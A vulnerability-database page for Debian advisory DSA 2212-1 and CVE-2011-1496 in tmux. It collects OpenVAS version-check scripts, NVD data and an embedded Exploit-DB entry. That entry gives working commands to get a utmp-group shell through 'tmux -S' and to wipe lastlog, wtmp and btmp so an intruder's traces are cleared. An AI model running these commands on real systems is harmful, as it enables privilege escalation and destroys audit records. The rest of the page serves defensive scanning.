Search...

Debian Security Advisory DSA 2212-1 (tmux)

2011-05-12T00:00:00

ID OPENVAS:136141256231069556
Type openvas
Reporter Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com
Modified 2019-03-18T00:00:00

Description

The remote host is missing an update to tmux announced via advisory DSA 2212-1.

                                        
                                            # OpenVAS Vulnerability Test
# $Id: deb_2212_1.nasl 14275 2019-03-18 14:39:45Z cfischer $
# Description: Auto-generated from advisory DSA 2212-1 (tmux)
#
# Authors:
# Thomas Reinke &lt;reinke@securityspace.com&gt;
#
# Copyright:
# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.69556");
  script_version("$Revision: 14275 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $");
  script_tag(name:"creation_date", value:"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)");
  script_tag(name:"cvss_base", value:"4.6");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2011-1496");
  script_name("Debian Security Advisory DSA 2212-1 (tmux)");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com");
  script_family("Debian Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB(6|7)");
  script_xref(name:"URL", value:"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202212-1");
  script_tag(name:"insight", value:"Daniel Danner discovered that tmux, a terminal multiplexer, is not
properly dropping group privileges.  Due to a patch introduced by Debian,
when invoked with the -S option, tmux is not dropping permissions obtained
through its setgid installation.


The oldstable distribution (lenny) is not affected by this problem,
it does not include tmux.

For the stable distribution (squeeze), this problem has been fixed in
version 1.3-2+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in
version 1.4-6.

For the testing distribution (sid), this problem has been fixed in
version 1.4-6.");

  script_tag(name:"solution", value:"We recommend that you upgrade your tmux packages.");
  script_tag(name:"summary", value:"The remote host is missing an update to tmux
announced via advisory DSA 2212-1.");
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-deb.inc");

res = "";
report = "";
if((res = isdpkgvuln(pkg:"tmux", ver:"1.3-2+squeeze1", rls:"DEB6")) != NULL) {
  report += res;
}
if((res = isdpkgvuln(pkg:"tmux", ver:"1.4-6", rls:"DEB7")) != NULL) {
  report += res;
}

if(report != "") {
  security_message(data:report);
} else if (__pkg_match) {
  exit(99);
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:136141256231069556", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 2212-1 (tmux)", "description": "The remote host is missing an update to tmux\nannounced via advisory DSA 2212-1.", "published": "2011-05-12T00:00:00", "modified": "2019-03-18T00:00:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069556", "reporter": "Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com", "references": ["https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202212-1"], "cvelist": ["CVE-2011-1496"], "lastseen": "2019-05-29T18:39:27", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1496"]}, {"type": "openvas", "idList": ["OPENVAS:862998", "OPENVAS:862996", "OPENVAS:1361412562310862996", "OPENVAS:1361412562310862998", "OPENVAS:69556"]}, {"type": "exploitdb", "idList": ["EDB-ID:17147"]}, {"type": "debian", "idList": ["DEBIAN:BSA-032:151E2", "DEBIAN:DSA-2212-1:E2DA3"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26091"]}, {"type": "seebug", "idList": ["SSV:71596"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE6F662161F64680EFBFC345AFDB128E"]}, {"type": "nessus", "idList": ["FEDORA_2011-5486.NASL", "DEBIAN_DSA-2212.NASL", "FEDORA_2011-5156.NASL", "FEDORA_2011-5167.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:100272"]}, {"type": "fedora", "idList": ["FEDORA:3C14C11073F", "FEDORA:A0AED110C52", "FEDORA:5289A1103AF"]}], "modified": "2019-05-29T18:39:27", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2019-05-29T18:39:27", "rev": 2}, "vulnersScore": 5.8}, "pluginID": "136141256231069556", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2212_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2212-1 (tmux)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69556\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1496\");\n script_name(\"Debian Security Advisory DSA 2212-1 (tmux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202212-1\");\n script_tag(name:\"insight\", value:\"Daniel Danner discovered that tmux, a terminal multiplexer, is not\nproperly dropping group privileges. Due to a patch introduced by Debian,\nwhen invoked with the -S option, tmux is not dropping permissions obtained\nthrough its setgid installation.\n\n\nThe oldstable distribution (lenny) is not affected by this problem,\nit does not include tmux.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.3-2+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1.4-6.\n\nFor the testing distribution (sid), this problem has been fixed in\nversion 1.4-6.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your tmux packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to tmux\nannounced via advisory DSA 2212-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"tmux\", ver:\"1.3-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tmux\", ver:\"1.4-6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks"}

{"cve": [{"lastseen": "2020-10-03T11:39:26", "description": "tmux 1.3 and 1.4 does not properly drop group privileges, which allows local users to gain utmp group privileges via a filename to the -S command-line option.", "edition": 3, "cvss3": {}, "published": "2011-04-18T18:55:00", "title": "CVE-2011-1496", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1496"], "modified": "2017-08-17T01:34:00", "cpe": ["cpe:/a:nicholas_marriott:tmux:1.4", "cpe:/a:nicholas_marriott:tmux:1.3"], "id": "CVE-2011-1496", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1496", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nicholas_marriott:tmux:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:nicholas_marriott:tmux:1.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:55:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "description": "The remote host is missing an update to tmux\nannounced via advisory DSA 2212-1.", "modified": "2017-07-07T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:69556", "href": "http://plugins.openvas.org/nasl.php?oid=69556", "type": "openvas", "title": "Debian Security Advisory DSA 2212-1 (tmux)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2212_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2212-1 (tmux)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Daniel Danner discovered that tmux, a terminal multiplexer, is not\nproperly dropping group privileges. Due to a patch introduced by Debian,\nwhen invoked with the -S option, tmux is not dropping permissions obtained\nthrough its setgid installation.\n\n\nThe oldstable distribution (lenny) is not affected by this problem,\nit does not include tmux.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.3-2+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1.4-6.\n\nFor the testing distribution (sid), this problem has been fixed in\nversion 1.4-6.\n\n\nWe recommend that you upgrade your tmux packages.\";\ntag_summary = \"The remote host is missing an update to tmux\nannounced via advisory DSA 2212-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202212-1\";\n\n\nif(description)\n{\n script_id(69556);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1496\");\n script_name(\"Debian Security Advisory DSA 2212-1 (tmux)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tmux\", ver:\"1.3-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tmux\", ver:\"1.4-6\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "description": "Check for the Version of tmux", "modified": "2017-07-10T00:00:00", "published": "2011-04-21T00:00:00", "id": "OPENVAS:862998", "href": "http://plugins.openvas.org/nasl.php?oid=862998", "type": "openvas", "title": "Fedora Update for tmux FEDORA-2011-5167", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tmux FEDORA-2011-5167\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"tmux on Fedora 14\";\ntag_insight = \"tmux is a "terminal multiplexer." It enables a number of terminals (or\n windows) to be accessed and controlled from a single terminal. tmux is\n intended to be a simple, modern, BSD-licensed alternative to programs such\n as GNU Screen.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058367.html\");\n script_id(862998);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-21 08:14:46 +0200 (Thu, 21 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-5167\");\n script_cve_id(\"CVE-2011-1496\");\n script_name(\"Fedora Update for tmux FEDORA-2011-5167\");\n\n script_summary(\"Check for the Version of tmux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"tmux\", rpm:\"tmux~1.4~3.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "description": "Check for the Version of tmux", "modified": "2017-07-10T00:00:00", "published": "2011-04-21T00:00:00", "id": "OPENVAS:862996", "href": "http://plugins.openvas.org/nasl.php?oid=862996", "type": "openvas", "title": "Fedora Update for tmux FEDORA-2011-5156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tmux FEDORA-2011-5156\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"tmux on Fedora 13\";\ntag_insight = \"tmux is a "terminal multiplexer." It enables a number of terminals (or\n windows) to be accessed and controlled from a single terminal. tmux is\n intended to be a simple, modern, BSD-licensed alternative to programs such\n as GNU Screen.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058452.html\");\n script_id(862996);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-21 08:14:46 +0200 (Thu, 21 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-5156\");\n script_cve_id(\"CVE-2011-1496\");\n script_name(\"Fedora Update for tmux FEDORA-2011-5156\");\n\n script_summary(\"Check for the Version of tmux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"tmux\", rpm:\"tmux~1.4~3.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-04-21T00:00:00", "id": "OPENVAS:1361412562310862998", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862998", "type": "openvas", "title": "Fedora Update for tmux FEDORA-2011-5167", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tmux FEDORA-2011-5167\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058367.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862998\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-21 08:14:46 +0200 (Thu, 21 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-5167\");\n script_cve_id(\"CVE-2011-1496\");\n script_name(\"Fedora Update for tmux FEDORA-2011-5167\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tmux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"tmux on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"tmux\", rpm:\"tmux~1.4~3.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1496"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-04-21T00:00:00", "id": "OPENVAS:1361412562310862996", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862996", "type": "openvas", "title": "Fedora Update for tmux FEDORA-2011-5156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tmux FEDORA-2011-5156\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058452.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862996\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-21 08:14:46 +0200 (Thu, 21 Apr 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-5156\");\n script_cve_id(\"CVE-2011-1496\");\n script_name(\"Fedora Update for tmux FEDORA-2011-5156\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tmux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"tmux on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"tmux\", rpm:\"tmux~1.4~3.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T07:17:51", "description": "tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability. CVE-2011-1496. Local exploit for linux platform", "published": "2011-04-11T00:00:00", "type": "exploitdb", "title": "tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1496"], "modified": "2011-04-11T00:00:00", "id": "EDB-ID:17147", "href": "https://www.exploit-db.com/exploits/17147/", "sourceData": "---------------------------------------\r\n| Team ph0x90bic proudly presents |\r\n| tmux -S 1.3/1.4 local utmp exploit |\r\n---------------------------------------\r\n\r\n# Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability\r\n# Date: 11.04.2011\r\n# Author: ph0x90bic\r\n# Software Link: http://tmux.sourceforge.net/\r\n# Version: 1.3/1.4\r\n# Tested on: Linux debian 2.6.26-1-686\r\n# CVE : CVE-2011-1496\r\n\r\n---\r\n\r\nINTRODUCTION\r\n\r\ntmux 1.3/1.4 contains a privilege escalation vulnerabillity,\r\nwhich gives you utmp group privileges. This bug is important,\r\nbecause it is possible to clean logfiles and use logcleaners\r\nfor btmp, wtmp and lastlog without local root access.\r\n\r\n---\r\n\r\nEXPLOIT\r\n\r\nExecute shell as utmp group\r\n\r\n$ tmux -S /tmp/.whateveryouwant -c id\r\nuid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)\r\n\r\n$ tmux -S /tmp/.whateveryouwant -c /bin/sh\r\n$ id\r\nuid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company)\r\n\r\n--\r\n\r\nDelete logfiles\r\n\r\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog'\r\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp'\r\n$ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp'\r\n\r\n--\r\n\r\nUse logcleaner software\r\n\r\n$ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17147/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-1496"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2212-1 security@debian.org\r\nhttp://www.debian.org/security/ Nico Golde\r\nApril 7, 2011 http://www.debian.org/security/faq\r\n- 